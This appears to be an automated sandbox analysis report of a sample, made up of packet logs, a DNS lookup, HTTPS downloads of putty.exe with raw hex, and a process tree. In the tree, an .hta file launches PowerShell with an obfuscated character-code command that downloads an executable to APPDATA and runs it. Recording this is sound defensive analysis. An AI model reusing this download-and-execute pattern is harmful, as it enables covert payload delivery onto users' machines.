                                                        Jan 3, 2025 12:17:57.704969883 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.705024958 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.705436945 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.705486059 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.705651045 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.705707073 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.733380079 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.733434916 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.733520031 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.733570099 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.747684002 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.747744083 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.747764111 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.747772932 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.747786999 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.747812033 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.785960913 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.786058903 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.786186934 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.786242962 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.786242962 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.786252975 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.786290884 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.786408901 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.786462069 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.786576986 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.786634922 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.786701918 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.786760092 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.786900043 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.786956072 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.787041903 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.787098885 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.787319899 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.787374020 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.787378073 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.787385941 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.787477016 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.787542105 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.787595034 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.787631035 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.787708044 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.819719076 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.819781065 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.819819927 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.819865942 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.833965063 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.834027052 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.834141016 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.834199905 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.872469902 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.872515917 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.872550964 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.872560024 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.872591972 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.872602940 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.872618914 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.872622967 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.872644901 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.872673988 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.872698069 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.872746944 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.872884035 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.872941971 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.873071909 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.873128891 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.873265982 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.873306990 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.873322010 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.873326063 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.873352051 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.873370886 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.873442888 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.873500109 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.873644114 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.873703957 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.873827934 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.873888969 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.873990059 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.874044895 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.874075890 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.874131918 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.906090975 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.906147957 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.906167030 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.906172037 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.906184912 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.906213999 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.920663118 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.920744896 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.920753956 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.920758963 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.920793056 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.959425926 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.959501982 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.959507942 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.959517956 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.959566116 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.959670067 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.959728956 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.959738016 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.959780931 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.959793091 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.959800005 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.959847927 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.959947109 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.959981918 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.959986925 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.959997892 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.960028887 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.960370064 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.960423946 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.960429907 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.960433960 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.960484982 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.960499048 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.960546970 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.960560083 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.960568905 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.960592985 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.960617065 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.960658073 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.960712910 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.960763931 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.960824013 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.992835999 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.992950916 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.992952108 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.992959976 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.993010044 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.993030071 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.007081032 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.007150888 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.007205009 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.007265091 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.045310020 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.045387030 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.045401096 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.045406103 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.045438051 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.045454979 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.045581102 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.045629025 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.045643091 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.045646906 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.045681953 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.045797110 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.045850039 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.045855999 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.045860052 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.045897961 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.046003103 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.046060085 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.046106100 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.046164036 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.046300888 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.046359062 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.046509027 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.046566010 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.046603918 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.046662092 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.046842098 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.046907902 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.078694105 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.078779936 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.079044104 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.079104900 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.093314886 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.093506098 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.093609095 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.093666077 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.131376028 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.131448030 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.131506920 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.131561995 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.131695032 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.131758928 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.131836891 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.131891012 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.132029057 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.132076979 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.132174015 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.132236004 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.132289886 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.132348061 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.132493019 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.132550001 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.132704020 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.132759094 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.132843018 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.132908106 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.132970095 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.133025885 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.133196115 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.133259058 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.133269072 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.133322001 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.165191889 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.165282965 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.165416002 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.165493965 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.179780006 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.179826021 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.179838896 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.179846048 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.179871082 CET49731443192.168.2.493.93.131.124
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 3, 2025 12:17:55.461955070 CET | 65443 | 53 | 192.168.2.4 | 1.1.1.1
Jan 3, 2025 12:17:55.585979939 CET | 53 | 65443 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 3, 2025 12:17:55.461955070 CET | 192.168.2.4 | 1.1.1.1 | 0x1eee | Standard query (0) | the.earth.li | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 3, 2025 12:17:55.585979939 CET | 1.1.1.1 | 192.168.2.4 | 0x1eee | No error (0) | the.earth.li | | 93.93.131.124 | A (IP address) | IN (0x0001) | false

• the.earth.li
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 93.93.131.124 | 443 | 7496 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-03 11:17:56 UTC | 98 | OUT | GET /~sgtatham/putty/latest/w64/putty.exe HTTP/1.1
Host: the.earth.li
Connection: Keep-Alive
2025-01-03 11:17:56 UTC | 227 | IN | HTTP/1.1 302 Found
Date: Fri, 03 Jan 2025 11:17:56 GMT
Server: Apache
Location: https://the.earth.li/~sgtatham/putty/0.82/w64/putty.exe
Content-Length: 302
Connection: close
Content-Type: text/html; charset=iso-8859-1
2025-01-03 11:17:56 UTC | 302 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://the.earth.li/~sgtatham/putty/0.82/w64/putty.exe">here</a>.</p><hr><address>Apache Server at


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 93.93.131.124 | 443 | 7496 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-03 11:17:57 UTC | 72 | OUT | GET /~sgtatham/putty/0.82/w64/putty.exe HTTP/1.1
Host: the.earth.li
2025-01-03 11:17:57 UTC | 257 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 11:17:57 GMT
Server: Apache
Last-Modified: Mon, 25 Nov 2024 20:03:19 GMT
ETag: "19b068-627c239596244"
Accept-Ranges: bytes
Content-Length: 1683560
Connection: close
Content-Type: application/x-msdos-program
                                                        Data Ascii: L$8H1H@^VWH(H=uHH(_^H%>LS]10$HHHHH(_^s/HVHfD)$fD)$)$)$LHJH1H$A@3uv=fA@LL$ H0A9D$
                                                        2025-01-03 11:17:57 UTC8000INData Raw: c1 44 0f b6 ca be 00 00 00 00 44 0f 48 ce 48 8b 74 24 50 3b 04 2e 75 39 44 89 da 81 e2 ff ff ff 0f 48 8d 2c 89 44 89 c8 24 01 3b 54 ae 04 0f 84 d1 00 00 00 84 c0 48 8b 74 24 60 74 23 e9 b6 00 00 00 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 41 f6 c1 01 48 8b 74 24 60 0f 85 91 00 00 00 49 63 c0 41 b1 01 48 39 c1 0f 8e 3b ff ff ff 89 cd 29 c5 48 8d 50 01 40 f6 c5 01 74 1b 48 8d 04 80 81 4c 83 04 ff ff 03 00 48 8b 47 28 48 8b 04 f0 48 8b 58 18 48 89 d0 48 39 d1 0f 84 00 ff ff ff 48 8d 14 85 00 00 00 00 48 8d 14 92 0f 1f 40 00 81 4c 13 04 ff ff 03 00 48 8b 6f 28 48 8b 6c f5 00 48 8b 6d 18 81 4c 15 18 ff ff 03 00 48 83 c0 02 48 8b 6f 28 48 8b 6c f5 00 48 8b 5d 18 48 83 c2 28 48 39 c1 75 c9 e9 b4 fe ff ff 0f 1f 40 00 89 d0 24 01 41 89 d1 84 c0 0f 85 aa fe ff
                                                        Data Ascii: DDHHt$P;.u9DH,D$;THt$`t#f.DAHt$`IcAH9;)HP@tHLHG(HHXHH9HH@LHo(HlHmLHHo(HlH]H(H9u@$A
                                                        2025-01-03 11:17:57 UTC8000INData Raw: 85 fb 00 00 00 01 41 c6 85 01 11 00 00 00 41 80 bd 7a 11 00 00 00 74 2c 41 80 bd 80 01 00 00 00 74 22 ff 15 69 61 11 00 48 8d 15 12 aa 00 00 89 c1 4d 89 e8 e8 58 bb 01 00 41 89 85 08 11 00 00 b0 01 eb 02 31 c0 41 88 85 01 11 00 00 41 80 bd f9 10 00 00 00 74 11 48 83 c4 28 5b 5d 5f 5e 41 5c 41 5d 41 5e 41 5f c3 41 c6 85 f9 10 00 00 01 48 8d 0d 7a a9 00 00 4c 89 ea 48 83 c4 28 5b 5d 5f 5e 41 5c 41 5d 41 5e 41 5f e9 32 b9 01 00 cc cc 41 57 41 56 56 57 53 48 83 ec 40 48 89 ce 48 8b 05 db b9 11 00 48 31 e0 48 89 44 24 38 80 b9 18 01 00 00 00 75 0d 80 be 19 01 00 00 00 0f 84 c7 00 00 00 48 89 f1 e8 75 c3 00 00 48 8d be 20 01 00 00 48 89 f9 e8 16 3b 02 00 48 85 c0 0f 84 87 00 00 00 48 89 c3 48 8d 4c 24 20 48 89 fa e8 2d 66 03 00 48 8b 44 24 20 8a 00 88 44 24 37
                                                        Data Ascii: AAzt,At"iaHMXA1AAtH([]_^A\A]A^A_AHzLH([]_^A\A]A^A_2AWAVVWSH@HHH1HD$8uHuH H;HHHL$ H-fHD$ D$7
                                                        2025-01-03 11:17:57 UTC8000INData Raw: 81 00 01 00 00 85 c0 74 1d 45 0f b6 d0 41 80 f8 1b 0f 87 41 01 00 00 ba 00 25 00 08 4c 0f a3 d2 0f 83 32 01 00 00 48 63 91 e4 00 00 00 b8 00 28 ff ff 03 84 91 a8 01 00 00 41 0f b6 c8 c1 c0 18 83 f8 03 0f 87 ba 00 00 00 48 8d 15 1d 02 00 00 48 63 04 82 48 01 d0 ff e0 41 0f b6 c0 41 0f b6 84 01 0c 0a 00 00 3d ff 00 00 00 0f 85 11 ff ff ff 81 c9 00 d9 00 00 89 c8 c3 81 f9 ff 07 00 00 77 33 83 7a 08 01 0f 8e 20 01 00 00 b8 2a 00 00 80 c3 44 89 c8 83 e0 e0 3d c0 00 00 00 75 32 c7 02 01 00 00 00 c7 42 08 01 00 00 00 41 83 e1 1f e9 ad 01 00 00 81 f9 ff ff 00 00 0f 87 83 00 00 00 83 7a 08 02 0f 8e e1 00 00 00 b8 2a 00 00 80 c3 44 89 c8 83 e0 f0 3d e0 00 00 00 0f 85 8f 00 00 00 c7 02 02 00 00 00 c7 42 08 02 00 00 00 41 83 e1 0f e9 6a 01 00 00 41 81 c9 00 d8 00 00
                                                        Data Ascii: tEAA%L2Hc(AHHcHAA=w3z *D=u2BAz*D=BAjA



                                                        Target ID:0
                                                        Start time:06:17:53
                                                        Start date:03/01/2025
                                                        Path:C:\Windows\SysWOW64\mshta.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:mshta.exe "C:\Users\user\Desktop\qwertyuiopasdfghjklzxcvbnm.hta"
                                                        Imagebase:0x680000
                                                        File size:13'312 bytes
                                                        MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:1
                                                        Start time:06:17:54
                                                        Start date:03/01/2025
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTF($zbaIc, $FeyQCF){[IO.File]::WriteAllBytes($zbaIc, $FeyQCF)};function o($zbaIc){if($zbaIc.EndsWith((X @(254,308,316,316))) -eq $True){Start-Process (X @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaIc}else{Start-Process $zbaIc}};function Dwm($QOqguGOgy){$XGUiZZx = New-Object (X @(286,309,324,254,295,309,306,275,316,313,309,318,324));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$FeyQCF = $XGUiZZx.DownloadData($QOqguGOgy);return $FeyQCF};function X($PkXNL){$bzLbp=208;$hWqeYBbV=$Null;foreach($TPTApHL in $PkXNL){$hWqeYBbV+=[char]($TPTApHL-$bzLbp)};return $hWqeYBbV};function ubZ(){$h = $env:APPDATA + '\';$qZD = Dwm (X @(312,324,324,320,323,266,255,255,324,312,309,254,309,305,322,324,312,254,316,313,255,334,323,311,324,305,324,312,305,317,255,320,325,324,324,329,255,316,305,324,309,323,324,255,327,262,260,255,320,325,324,324,329,254,309,328,309));$G = $h + 'putty.exe';QTF $G $qZD;o $G;;;;}ubZ;
                                                        Imagebase:0x830000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:06:17:54
                                                        Start date:03/01/2025
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:06:17:58
                                                        Start date:03/01/2025
                                                        Path:C:\Users\user\AppData\Roaming\putty.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\AppData\Roaming\putty.exe"
                                                        Imagebase:0x7ff738a30000
                                                        File size:1'683'560 bytes
                                                        MD5 hash:765BDC0F8BC0D77F7414E7A36AE45FD9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 3%, ReversingLabs
                                                        • Detection: 6%, Virustotal, Browse
                                                        Reputation:low
                                                        Has exited:false

                                                          • API String ID:
                                                          • Opcode ID: 36353d11f0ae1fbde2eef550a69eff2e230dd5b887dfd2c8d70525ed23207f73
                                                          • Instruction ID: a6db34c21d5b4f0b40cf4570528528eb9b7b5dd9615362f133f1b42625d693b4
                                                          • Opcode Fuzzy Hash: 36353d11f0ae1fbde2eef550a69eff2e230dd5b887dfd2c8d70525ed23207f73
                                                          • Instruction Fuzzy Hash: 97212674A002199FCB10CF48C8949AAFBF1FF49310B158599E909EB362C735EC51CBA0
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 74f992017001a7ca722db346571fa7550c923e9ce5e1dceb3609e90d8dbe41f3
                                                          • Instruction ID: 3fcee0e9ff3c407caf991bd8f326d553d5ef32de2192e968bc611339f79ddc91
                                                          • Opcode Fuzzy Hash: 74f992017001a7ca722db346571fa7550c923e9ce5e1dceb3609e90d8dbe41f3
                                                          • Instruction Fuzzy Hash: AD2168B8A002099FCB00CF9CC8909AABBF4FF89310B118599E919EB351D334FC41CBA0
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
